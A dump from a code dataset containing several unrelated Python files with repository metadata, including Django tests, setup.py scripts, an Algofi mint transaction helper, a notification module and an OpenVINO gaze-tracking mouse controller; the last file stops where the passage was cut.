df5be020af94bab9e82de5a99d0b4ee436cb2749 | 2,716 | py | Python | core/tests/test_models.py | kaedroho/dit-directory-cms | 67c15eeed19e7b3583f1fce1969230ddf83b6813 | [
"MIT"
] | null | null | null | core/tests/test_models.py | kaedroho/dit-directory-cms | 67c15eeed19e7b3583f1fce1969230ddf83b6813 | [
"MIT"
] | null | null | null | core/tests/test_models.py | kaedroho/dit-directory-cms | 67c15eeed19e7b3583f1fce1969230ddf83b6813 | [
"MIT"
] | null | null | null | import pytest
from django.conf import settings
from django.core.exceptions import ValidationError
from django.utils import translation
from wagtail.core.models import Page
from find_a_supplier.tests.factories import IndustryPageFactory
from invest.tests.factories import InvestAppFactory, \
SectorLandingPageFactory, SectorPageFactory
from invest.models import InvestApp
@pytest.mark.django_db
def test_slugs_are_unique_in_the_same_service():
IndustryPageFactory(slug='foo')
with pytest.raises(ValidationError) as excinfo:
IndustryPageFactory(slug='foo')
assert 'This slug is already in use' in str(excinfo.value)
@pytest.mark.django_db
def test_slugs_are_not_unique_across_services(root_page):
page_one = IndustryPageFactory(slug='foo', parent=root_page)
page_two = SectorPageFactory(slug='foo', parent=root_page)
assert page_one.slug == 'foo'
assert page_two.slug == 'foo'
@pytest.mark.django_db
def test_delete_same_slug_different_services(root_page):
"""
Deleting a page results in ancestor pages being re-saved.
Thus ancestor page (root_page) has to have title & title.
"""
root_page.title = 'ancestor page has to have a title'
root_page.save()
page_one = IndustryPageFactory(slug='foo', parent=root_page)
page_two = SectorPageFactory(slug='foo', parent=root_page)
assert page_one.slug == 'foo'
assert page_two.slug == 'foo'
page_one.delete()
assert Page.objects.filter(pk=page_one.pk).exists() is False
@pytest.mark.django_db
def test_page_path(root_page):
page_one = SectorLandingPageFactory(parent=root_page)
page_two = SectorPageFactory(slug='foo', parent=page_one)
page_three = SectorPageFactory(slug='bar', parent=page_two)
assert page_three.full_path == '/industries/foo/bar/'
assert page_two.full_path == '/industries/foo/'
@pytest.mark.django_db
def test_base_model_check_valid_draft_token(page):
draft_token = page.get_draft_token()
assert page.is_draft_token_valid(draft_token) is True
@pytest.mark.django_db
def test_base_model_check_invalid_draft_token(page):
assert page.is_draft_token_valid('asdf') is False
@pytest.mark.django_db
def test_base_model_sets_service_name_on_save(page):
assert page.service_name == page.service_name_value
@pytest.mark.django_db
def test_base_model_redirect_published_url(rf, page):
request = rf.get('/')
response = page.serve(request)
assert response.status_code == 302
assert response.url == page.get_url()
@pytest.mark.django_db
def test_base_app_slugs_are_created_in_all_languages(root_page):
app = InvestAppFactory(title='foo', parent=root_page)
assert app.slug == InvestApp.slug_identity
| 31.218391 | 64 | 0.768778 | 387 | 2,716 | 5.108527 | 0.281654 | 0.052605 | 0.072838 | 0.081942 | 0.35913 | 0.347496 | 0.320182 | 0.286292 | 0.198786 | 0.133536 | 0 | 0.00128 | 0.136966 | 2,716 | 86 | 65 | 31.581395 | 0.84215 | 0.042342 | 0 | 0.327586 | 0 | 0 | 0.054243 | 0 | 0 | 0 | 0 | 0 | 0.241379 | 1 | 0.155172 | false | 0 | 0.137931 | 0 | 0.293103 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df5c62e88857a20ae95ab8ff976f6b9308f5cbf7 | 1,315 | py | Python | htmldatatables/__init__.py | juhajokela/htmldatatables | 298467e6256fc1c1c16c0af9f1d2de8782935715 | [
"MIT"
] | null | null | null | htmldatatables/__init__.py | juhajokela/htmldatatables | 298467e6256fc1c1c16c0af9f1d2de8782935715 | [
"MIT"
] | null | null | null | htmldatatables/__init__.py | juhajokela/htmldatatables | 298467e6256fc1c1c16c0af9f1d2de8782935715 | [
"MIT"
] | null | null | null | import os
from collections.abc import Iterable
DIRECTORY = os.path.dirname(os.path.realpath(__file__))
TEMPLATES = os.path.join(DIRECTORY, 'templates')
def load_template(path):
with open(os.path.join(TEMPLATES, path)) as f:
return f.read()
def render_html(template, table):
return template.replace('{{table}}', table)
def generate_html_table(data):
def generate_header_row(obj):
cells = ''.join(f'<th>{x}</th>' for x in obj.keys())
return f'<thead><tr>{cells}</tr></thead>'
def generate_data_row(obj):
cells = ''.join(f'<td>{x}</td>' for x in obj.values())
return f'<tr>{cells}</tr>'
assert isinstance(data, Iterable), 'data is not iterable'
obj = next(iter(data))
assert isinstance(obj, dict), 'data object is not dictionary'
table = '<table id="table">'
table += generate_header_row(obj)
table += '<tbody>'
for obj in data:
table += generate_data_row(obj)
table += '</tbody>'
return table + '</table>'
HTMLTABLE = load_template('htmltable.html')
DATATABLES = load_template('datatables.html')
def render_table(data, datatables=False):
html_table = generate_html_table(data)
if not datatables:
return render_html(HTMLTABLE, html_table)
return render_html(DATATABLES, html_table)
| 26.3 | 65 | 0.661597 | 179 | 1,315 | 4.715084 | 0.312849 | 0.053318 | 0.023697 | 0.049763 | 0.037915 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.190875 | 1,315 | 49 | 66 | 26.836735 | 0.793233 | 0 | 0 | 0 | 0 | 0 | 0.158175 | 0.023574 | 0 | 0 | 0 | 0 | 0.060606 | 1 | 0.181818 | false | 0 | 0.060606 | 0.030303 | 0.454545 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df5d14417de1e8123f6427664b0bb96e2cca8f09 | 1,562 | py | Python | bitcoinstore/api/handlers/put_non_fungible.py | 0x1a8008/bitcoin-store | 7a490d81de4e874e6e455b62b406ba9059c1fb55 | [
"MIT"
] | null | null | null | bitcoinstore/api/handlers/put_non_fungible.py | 0x1a8008/bitcoin-store | 7a490d81de4e874e6e455b62b406ba9059c1fb55 | [
"MIT"
] | null | null | null | bitcoinstore/api/handlers/put_non_fungible.py | 0x1a8008/bitcoin-store | 7a490d81de4e874e6e455b62b406ba9059c1fb55 | [
"MIT"
] | null | null | null | """
Handles the validation and loading of a non-fungible item and its associated
parent type to the db.
"""
from bitcoinstore.extensions import db
from bitcoinstore.api.models.NonFungibleItem import NonFungibleItem
from bitcoinstore.api.models.NonFungibleType import NonFungibleType
def put_non_fungible(sku, sn, properties) -> dict:
try:
type = db.session.query(NonFungibleType).get(sku)
if not type: # SKU type does not exist, create one
type = NonFungibleType(sku, properties)
db.session.add(type)
else:
type.update(properties)
item = db.session.query(NonFungibleItem).get(sn)
if not item: # SN item does not exist, create one
item = NonFungibleItem(sn, properties)
item.sku = sku
else:
item.update(properties)
db.session.add(type)
db.session.add(item)
db.session.commit()
item_summary = item.get_summary()
type_summary = type.get_summary()
return {
"sn": item_summary['sn'],
"color": item_summary['color'],
"description": type_summary['description'],
"notes": item_summary['notes'],
"price_cents": item_summary['price_cents'],
"reserved": item_summary['reserved'],
"shipping_weight_grams": type_summary['shipping_weight_grams'],
"sku": item_summary['sku'],
"sold": item_summary['sold']
}
except Exception as e:
print(e)
return {}
| 29.471698 | 76 | 0.608195 | 174 | 1,562 | 5.33908 | 0.350575 | 0.094726 | 0.038751 | 0.053821 | 0.101184 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.286172 | 1,562 | 52 | 77 | 30.038462 | 0.833184 | 0.109475 | 0 | 0.111111 | 0 | 0 | 0.101302 | 0.030391 | 0 | 0 | 0 | 0 | 0 | 1 | 0.027778 | false | 0 | 0.083333 | 0 | 0.166667 | 0.027778 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df5f2416c3d993516e7f533b137098736ce6b338 | 1,565 | py | Python | setup.py | sysid/kneed | f5a22df8281e00c62f9ee7c947b62a8aaa07f8be | [
"BSD-3-Clause"
] | 1 | 2021-10-03T07:33:34.000Z | 2021-10-03T07:33:34.000Z | setup.py | deysn/kneed | d7b75a184a86e4ac146acee09ed61d42554b048b | [
"BSD-3-Clause"
] | null | null | null | setup.py | deysn/kneed | d7b75a184a86e4ac146acee09ed61d42554b048b | [
"BSD-3-Clause"
] | null | null | null | from setuptools import setup, find_packages
from codecs import open as copen
from os import path
here = path.abspath(path.dirname(__file__))
# Get the long description from the README file
with copen(path.join(here, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
# get the dependencies and installs
with copen(path.join(here, 'requirements.txt'), encoding='utf-8') as f:
all_reqs = f.read().split('\n')
install_requires = [x.strip() for x in all_reqs if 'git+' not in x]
dependency_links = [
x.strip().replace('git+', '') for x in all_reqs if x.startswith('git+')
]
version = {}
with open("kneed/version.py") as fp:
exec(fp.read(), version)
setup(
name='kneed',
version=version['__version__'],
description='Knee-point detection in Python',
long_description=long_description,
long_description_content_type='text/markdown',
url='https://github.com/arvkevi/kneed',
download_url='https://github.com/arvkevi/kneed/tarball/' + version['__version__'],
license='BSD',
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Science/Research',
'Topic :: Scientific/Engineering :: Information Analysis',
'Programming Language :: Python :: 3',
],
keywords='knee-detection system',
packages=find_packages(exclude=['docs', 'tests*']),
include_package_data=True,
author='Kevin Arvai',
install_requires=install_requires,
tests_requires=['pytest'],
dependency_links=dependency_links,
author_email='arvkevi@gmail.com',
)
| 31.938776 | 86 | 0.688818 | 201 | 1,565 | 5.19403 | 0.522388 | 0.071839 | 0.024904 | 0.032567 | 0.153257 | 0.084291 | 0 | 0 | 0 | 0 | 0 | 0.003067 | 0.166773 | 1,565 | 48 | 87 | 32.604167 | 0.797546 | 0.050479 | 0 | 0 | 0 | 0 | 0.29265 | 0.014835 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.076923 | 0 | 0.076923 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df6219cbe0277768d92d5d74c2d4bb86b688c418 | 1,808 | py | Python | src/tox_ansible/tox_lint_case.py | greg-hellings/tox-ansible-collection | 174ade3a634ce21c757e5e0efa1d5fbc8e0ede72 | [
"MIT"
] | null | null | null | src/tox_ansible/tox_lint_case.py | greg-hellings/tox-ansible-collection | 174ade3a634ce21c757e5e0efa1d5fbc8e0ede72 | [
"MIT"
] | null | null | null | src/tox_ansible/tox_lint_case.py | greg-hellings/tox-ansible-collection | 174ade3a634ce21c757e5e0efa1d5fbc8e0ede72 | [
"MIT"
] | null | null | null | from copy import copy
from pathlib import Path
from .tox_base_case import ToxBaseCase
from .tox_helper import Tox
BASH = "cd {} && molecule {} lint -s {}"
class ToxLintCase(ToxBaseCase):
description = "Auto-generated lint for ansible cases"
def __init__(self, cases, name_parts=None):
self._cases = copy(cases)
self._name_parts = name_parts or []
self._config = Tox()
super().__init__()
def get_commands(self, options):
if self.is_precommit:
cmds = [["pre-commit", "run", "--all"]]
else:
cmds = []
# Construct the ansible-lint command
ansible_lint = ["ansible-lint", "-R"]
if options.ansible_lint:
ansible_lint.append("-c")
ansible_lint.append(options.ansible_lint)
cmds.append(ansible_lint)
# Construct the yamllint command
if options.yamllint:
yamllint = ["yamllint", "-c", options.yamllint, "."]
cmds.append(yamllint)
# Construct the flake8 invocation
flake8 = ["flake8", "."]
cmds.append(flake8)
return cmds
@property
def is_precommit(self) -> bool:
"""Determines if this repository is configured to use pre-commit
or not."""
p = Path(self.working_dir) / ".pre-commit-config.yaml"
return p.exists()
@property
def working_dir(self):
return self._config.toxinidir
@property
def dependencies(self):
if self.is_precommit:
deps = set(["pre-commit"])
else:
deps = set(["flake8", "ansible-lint", "yamllint", "ansible"])
return deps
def get_name(self, fmt=""):
return "-".join(self._name_parts + ["lint_all"])
| 28.25 | 73 | 0.57135 | 199 | 1,808 | 5.020101 | 0.371859 | 0.099099 | 0.026026 | 0.034034 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004003 | 0.309181 | 1,808 | 63 | 74 | 28.698413 | 0.795837 | 0.09292 | 0 | 0.159091 | 0 | 0 | 0.120074 | 0.014163 | 0 | 0 | 0 | 0 | 0 | 1 | 0.136364 | false | 0 | 0.090909 | 0.045455 | 0.386364 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df63b5b68fd38bb5792b3f99329d5814e6454f21 | 3,498 | py | Python | simplads/simplad_monad/simplad_base_helper.py | Cogmob/simplads | 8731c4a02273109187cfe601058ce797e32ba1ae | [
"MIT"
] | null | null | null | simplads/simplad_monad/simplad_base_helper.py | Cogmob/simplads | 8731c4a02273109187cfe601058ce797e32ba1ae | [
"MIT"
] | null | null | null | simplads/simplad_monad/simplad_base_helper.py | Cogmob/simplads | 8731c4a02273109187cfe601058ce797e32ba1ae | [
"MIT"
] | null | null | null | from .delta_type import DeltaType
from .namedtuples.bind_args import BindArgs
from .namedtuples.bound import Bound
from .simplad_base import SimpladBase
from .simplad_monad import WrappedDelta
import abc
'''
bind process
input
(~bound~, [])
extract unbound and annotation from ~bound~
call bind until lowest layer
call box
input
([higher deltas, ..], unbound) bind
call function
input
unbound
returned (value, {deltas: delta, ...})
bind up
returned (unbound, [(is_default, delta), ...)
returned (bound, [])
'''
class SimpladBaseHelper(SimpladBase):
@abc.abstractmethod
def apply_delta(annotation, delta):
''' returns a single bound value '''
return
@abc.abstractmethod
def initial_annotation(unbound):
''' returns the initial annotation '''
return
@abc.abstractmethod
def merge_deltas(a, b):
''' returns WrappedDelta '''
return
@classmethod
# returns (unbound,annotation), higher_deltas
def bind(cls, func):
def lam(i):
higher_deltas = i.deltas
higher_deltas.append(
WrappedDelta(type=DeltaType.default, delta=None))
res = cls.run(
func, i.bound.annotation, i.bound.unbound, higher_deltas)
unbound = res.bound
higher_deltas = res.deltas
wrapped_delta = cls.merge_r(higher_deltas.pop())
delta_type = wrapped_delta.type
if delta_type is DeltaType.finish:
return BindArgs(bound=unbound, deltas=higher_deltas)
if delta_type is DeltaType.default:
return BindArgs(bound=Bound(unbound=unbound, annotation=i.bound.annotation),
deltas=higher_deltas)
if delta_type is not DeltaType.configured:
raise TypeError('unknown delta type')
annotation, overwrite_unbound = cls.apply_delta(
i.bound.annotation,
wrapped_delta.delta,
unbound)
if overwrite_unbound.overwrite is True:
unbound = overwrite_unbound.new_value
return BindArgs(
bound=Bound(unbound=unbound, annotation=annotation),
deltas=higher_deltas)
return lam
@classmethod
# returns value, annotation
def unit(cls, func):
def ret(i):
applied = func(i)
return Bound(unbound=applied,
annotation=cls.initial_annotation(applied))
return ret
@classmethod
# return [unbound, higher_deltas]
def run(cls, func, annotation_before, unbound, higher_deltas):
return func(BindArgs(bound=unbound, deltas=higher_deltas))
@classmethod
# returns WrappedDelta
def merge_r(cls, wrapped_delta):
if (wrapped_delta.type is not DeltaType.list):
return wrapped_delta
sub_deltas = [cls.merge_r(d) for d in wrapped_delta.delta]
return reduce(
lambda acc, d: cls.merge_deltas_wrap(acc, d),
sub_deltas[1:],
sub_deltas[0])
@classmethod
# returns WrappedDelta
def merge_deltas_wrap(cls, a, b):
if a.type is b.type is DeltaType.finish:
return a
if a.type is b.type is DeltaType.default:
return a
return WrappedDelta(
type=DeltaType.configured,
delta=cls.merge_deltas(a.delta, b.delta))
| 30.417391 | 92 | 0.609777 | 384 | 3,498 | 5.427083 | 0.221354 | 0.074856 | 0.043186 | 0.018714 | 0.216891 | 0.127639 | 0.099808 | 0.023992 | 0 | 0 | 0 | 0.000824 | 0.306461 | 3,498 | 114 | 93 | 30.684211 | 0.858203 | 0.06518 | 0 | 0.205479 | 0 | 0 | 0.006205 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.136986 | false | 0 | 0.082192 | 0.013699 | 0.438356 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df659d906d53b0c61e9d3171a0f7de7260a4b059 | 3,381 | py | Python | algofi/v1/mint.py | zhengxunWu3/algofi-py-sdk | 8388d71d55eae583ac3579286b5f870aa3db2913 | [
"MIT"
] | 38 | 2021-12-30T02:32:57.000Z | 2022-03-23T22:09:16.000Z | algofi/v1/mint.py | zhengxunWu3/algofi-py-sdk | 8388d71d55eae583ac3579286b5f870aa3db2913 | [
"MIT"
] | 4 | 2021-11-03T00:14:46.000Z | 2022-03-28T02:17:33.000Z | algofi/v1/mint.py | zhengxunWu3/algofi-py-sdk | 8388d71d55eae583ac3579286b5f870aa3db2913 | [
"MIT"
] | 8 | 2021-12-15T05:29:55.000Z | 2022-02-08T03:45:11.000Z |
from algosdk.future.transaction import ApplicationNoOpTxn, PaymentTxn, AssetTransferTxn
from .prepend import get_init_txns
from ..utils import Transactions, TransactionGroup
from ..contract_strings import algofi_manager_strings as manager_strings
def prepare_mint_transactions(sender, suggested_params, storage_account, amount, bank_asset_id, manager_app_id, market_app_id, market_address, supported_market_app_ids, supported_oracle_app_ids, asset_id=None):
"""Returns a :class:`TransactionGroup` object representing a mint group
transaction against the algofi protocol. bAssets are not automatically
posted to collateral as in `prepare_mint_to_collateral_transactions`.
Sender sends assets to the account of the asset market application which
then sends an amount of market bank assets to the user.
:param sender: account address for the sender
:type sender: string
:param suggested_params: suggested transaction params
:type suggested_params: :class:`algosdk.future.transaction.SuggestedParams` object
:param storage_account: storage account address for sender
:type storage_account: string
:param amount: amount of asset to supply for minting bank assets
:type amount: int
:param bank_asset_id: asset id of the bank asset to be minted
:type bank_asset_id: int
:param manager_app_id: id of the manager application
:type manager_app_id: int
:param market_app_id: id of the market application for the bank asset
:type market_app_id: int
:param market_address: account address for the market application
:type market_address: string
:param supported_market_app_ids: list of supported market application ids
:type supported_market_app_ids: list
:param supported_oracle_app_ids: list of supported oracle application ids
:type supported_oracle_app_ids: list
:param asset_id: asset id of the asset being supplied, defaults to None (algo)
:type asset_id: int, optional
:return: :class:`TransactionGroup` object representing a mint group transaction
:rtype: :class:`TransactionGroup`
"""
prefix_transactions = get_init_txns(
transaction_type=Transactions.MINT,
sender=sender,
suggested_params=suggested_params,
manager_app_id=manager_app_id,
supported_market_app_ids=supported_market_app_ids,
supported_oracle_app_ids=supported_oracle_app_ids,
storage_account=storage_account
)
txn0 = ApplicationNoOpTxn(
sender=sender,
sp=suggested_params,
index=manager_app_id,
app_args=[manager_strings.mint.encode()]
)
txn1 = ApplicationNoOpTxn(
sender=sender,
sp=suggested_params,
index=market_app_id,
app_args=[manager_strings.mint.encode()],
foreign_apps=[manager_app_id],
foreign_assets=[bank_asset_id],
accounts=[storage_account]
)
if asset_id:
txn2 = AssetTransferTxn(
sender=sender,
sp=suggested_params,
receiver=market_address,
amt=amount,
index=asset_id
)
else:
txn2 = PaymentTxn(
sender=sender,
sp=suggested_params,
receiver=market_address,
amt=amount
)
txn_group = TransactionGroup(prefix_transactions + [txn0, txn1, txn2])
return txn_group | 42.2625 | 210 | 0.725525 | 421 | 3,381 | 5.565321 | 0.232779 | 0.032864 | 0.035851 | 0.044814 | 0.325224 | 0.237729 | 0.212548 | 0.16816 | 0.050363 | 0.050363 | 0 | 0.00264 | 0.215617 | 3,381 | 80 | 211 | 42.2625 | 0.880845 | 0.44898 | 0 | 0.23913 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.021739 | false | 0 | 0.086957 | 0 | 0.130435 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df66daaa9747f0019148015d719b4599c2bca06f | 1,794 | py | Python | app/users/notification.py | AniaPeszek/ReclamationAndTicketSystem | 42551732dcc9af42dc7401fbc13b8fdb6e3c132f | [
"MIT"
] | null | null | null | app/users/notification.py | AniaPeszek/ReclamationAndTicketSystem | 42551732dcc9af42dc7401fbc13b8fdb6e3c132f | [
"MIT"
] | null | null | null | app/users/notification.py | AniaPeszek/ReclamationAndTicketSystem | 42551732dcc9af42dc7401fbc13b8fdb6e3c132f | [
"MIT"
] | null | null | null | from app import db
from flask_login import current_user
from app.models import Ticket, Reclamation, User, Message
from flask import url_for
def send_message(EventClass, event_id, recipient):
if EventClass == Ticket:
content = create_msg_body_for_new_ticket(event_id)
msg = Message(author=current_user, recipient=recipient, content=content)
db.session.add(msg)
# recipient.add_notification('new_ticket_count', recipient.new_tickets())
recipient.add_notification("open_tickets_count", recipient.open_tickets())
recipient.add_notification("unread_message_count", recipient.new_messages())
db.session.commit()
if EventClass == Reclamation:
content = create_msg_body_for_new_reclamation(event_id)
msg = Message(author=current_user, recipient=recipient, content=content)
db.session.add(msg)
recipient.add_notification("unread_message_count", recipient.new_messages())
db.session.commit()
def create_msg_body_for_new_ticket(event_id):
link = url_for("ticket_bp.ticket", ticket_number=event_id)
ticket = Ticket.query.filter_by(id=event_id).first()
reclamation = ticket.reclamation
return f"""You have new ticket.<br>
Reclamation (id={reclamation.id}) from: {reclamation.reclamation_customer.name}<br>
Part Serial Number: {reclamation.reclamation_part_sn_id.part_sn}<br>
Go to <a href="{link}">ticket.</a> """
def create_msg_body_for_new_reclamation(event_id):
link = url_for("reclamation_bp.reclamation", reclamation_number=event_id)
reclamation = Reclamation.query.filter_by(id=event_id).first()
model = reclamation.reclamation_part_sn_id.part_no.model
return f'You have a new reclamation for your part ({model}).<br>Go to <a href="{link}">reclamation.</a> '
| 46 | 109 | 0.746934 | 244 | 1,794 | 5.213115 | 0.245902 | 0.049528 | 0.040881 | 0.050314 | 0.515723 | 0.5 | 0.407233 | 0.36478 | 0.267296 | 0.267296 | 0 | 0 | 0.143813 | 1,794 | 38 | 110 | 47.210526 | 0.828125 | 0.039576 | 0 | 0.258065 | 0 | 0.032258 | 0.237071 | 0.112144 | 0 | 0 | 0 | 0 | 0 | 1 | 0.096774 | false | 0 | 0.129032 | 0 | 0.290323 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df67adfbfcad2c99ac76305f2b4d17fc4dc56088 | 1,891 | py | Python | setup.py | yutongD/Player2Vec | 22b72d75f81dd057762f0c7225a4558a25095b8f | [
"Apache-2.0"
] | 447 | 2020-05-02T05:29:04.000Z | 2022-03-30T12:48:56.000Z | setup.py | lzz-hub-dev/DGFraud | ee74ce55c9206e6c194aef01ee43246ecf226254 | [
"Apache-2.0"
] | 11 | 2020-05-03T16:36:04.000Z | 2022-02-26T22:31:00.000Z | setup.py | lzz-hub-dev/DGFraud | ee74ce55c9206e6c194aef01ee43246ecf226254 | [
"Apache-2.0"
] | 115 | 2020-05-06T01:41:36.000Z | 2022-03-30T12:15:05.000Z | from setuptools import find_packages, setup
# read the contents of README file
from os import path
from io import open # for Python 2 and 3 compatibility
this_directory = path.abspath(path.dirname(__file__))
# read the contents of requirements.txt
with open(path.join(this_directory, 'requirements.txt'),
encoding='utf-8') as f:
requirements = f.read().splitlines()
setup(name='DGFraud',
version="0.1.0",
author="Yutong Deng, Yingtong Dou, Hengrui Zhang, and UIC BDSC Lab",
author_email="bdscsafegraph@gmail.com",
description='a GNN-based toolbox for fraud detection in Tensorflow',
long_description=open("README.md", "r", encoding="utf-8").read(),
long_description_content_type="text/markdown",
url='https://github.com/safe-graph/DGFraud',
download_url='https://github.com/safe-graph/DGFraud/archive/master.zip',
keywords=['fraud detection', 'anomaly detection', 'graph neural network',
'data mining', 'security'],
install_requires=['numpy>=1.16.4',
'tensorflow>=1.14.0,<2.0',
'scipy>=1.2.1',
'scikit_learn>=0.21rc2',
'networkx<=1.11'
],
packages=find_packages(exclude=['test']),
include_package_data=True,
setup_requires=['setuptools>=38.6.0'],
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Education',
'Intended Audience :: Financial and Insurance Industry',
'Intended Audience :: Science/Research',
'Intended Audience :: Developers',
'Intended Audience :: Information Technology',
'License :: OSI Approved :: Apache Software License',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
],
)
| 41.108696 | 79 | 0.611846 | 213 | 1,891 | 5.342723 | 0.605634 | 0.070299 | 0.026362 | 0.029877 | 0.057996 | 0.057996 | 0.057996 | 0 | 0 | 0 | 0 | 0.025605 | 0.256478 | 1,891 | 45 | 80 | 42.022222 | 0.783784 | 0.054469 | 0 | 0.051282 | 0 | 0 | 0.455157 | 0.037556 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.076923 | 0 | 0.076923 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df67b484bc799e1c36c9aac365dd46cca21d5596 | 7,200 | py | Python | main.py | ojsindher/Computer-Pointer-Controller-OPENVINO | 7e6c286d0eb90005cc5fc881439f09776c31755e | [
"MIT"
] | null | null | null | main.py | ojsindher/Computer-Pointer-Controller-OPENVINO | 7e6c286d0eb90005cc5fc881439f09776c31755e | [
"MIT"
] | null | null | null | main.py | ojsindher/Computer-Pointer-Controller-OPENVINO | 7e6c286d0eb90005cc5fc881439f09776c31755e | [
"MIT"
] | null | null | null | import os
import cv2
import time
import numpy as np
import pyautogui
import matplotlib.pyplot as plt
from input_feeder import InputFeeder
from mouse_controller import MouseController
from face_detection import Model_fd
from gaze_estimation import Model_ge
from facial_landmarks_detection import Model_fld
from head_pose_estimation import Model_hpe
from mouse_controller import MouseController
from argparse import ArgumentParser
def build_parser():
parser = ArgumentParser()
required = parser.add_argument_group('required', 'These are must provide arguments for the main.py script')
optional = parser.add_argument_group('optional', 'These are optional arguments as there is default values set in the app itself')
optional.add_argument("-d", "--device", type=str, default="CPU", help="Specify the target device to infer on: CPU, GPU, FPGA or MYRIAD is acceptable. Sample will look for a suitable plugin for device specified (CPU by default)")
optional.add_argument("-c", "--prob_threshold", type=float, default=0.5, help="This specifies the probability threshold value for face detection model")
optional.add_argument("-FDO", type=int, default=0, help="to toggle displaying face detector bounding boxes")
optional.add_argument("-FLD", type=int, default=0, help="to toggle displaying eyes bounding boxes")
required.add_argument("-t", "--input_type", required=True, type=str, help="This specifies the type of input whether it can be an image, or pre-saved videos, or the feed from a webcam")
required.add_argument("-f", "--model_fd", required=True, type=str, help="Path to model's directory with a trained model for face detection.")
required.add_argument("-g", "--model_ge", required=True, type=str, help="Path to to model's directory with a trained model for gaze estimation.")
required.add_argument("-p", "--model_hpe", required=True, type=str, help="Path to to model's directory with a trained model for head pose estimation.")
required.add_argument("-l", "--model_fld", required=True, type=str, help="Path to to model's directory with a trained model for facial landmarks detection.")
required.add_argument("-i", "--input", required=True, type=str, help="Path to image or video file")
return parser
def main(args):
device = args.device
input_type = args.input_type
input_file = args.input
model_fd = args.model_fd
model_ge = args.model_ge
model_hpe = args.model_hpe
model_fld = args.model_fld
conf = args.prob_threshold
flag_fd = args.FDO
flag_fld = args.FLD
'''Initializing all the classes and checking the different model classes for any unsupported layers'''
Face_Det = Model_fd(model_fd)
start_lt_fd = time.time()
Face_Det.load_model(device)
total_lt_fd = round((time.time() - start_lt_fd), 2)
Face_Det.check_model(device)
Head_Pose = Model_hpe(model_hpe)
start_lt_hpe = time.time()
Head_Pose.load_model(device)
total_lt_hpe = round((time.time() - start_lt_hpe), 2)
Head_Pose.check_model(device)
Landmarks_Det = Model_fld(model_fld)
start_lt_fld = time.time()
Landmarks_Det.load_model(device)
total_lt_fld = round((time.time() - start_lt_fld), 2)
Landmarks_Det.check_model(device)
Gaze_Det = Model_ge(model_ge)
start_lt_ge = time.time()
Gaze_Det.load_model(device)
total_lt_ge = round((time.time() - start_lt_ge), 2)
Gaze_Det.check_model(device)
mouse = MouseController('medium', 'medium')
'''Reading the input in a loop and passing it through the pipline of all the model's and then using their output
to move the pointer on screen using the pyautogui python library'''
feed=InputFeeder(input_type=input_type, input_file=input_file)
feed.load_data()
(width, height, fps) = feed.get_dim()
out_video = cv2.VideoWriter(os.path.join('/home/workspace/CPC_project/results/', 'output_video.mp4'), 0x00000021, fps, (width, height))
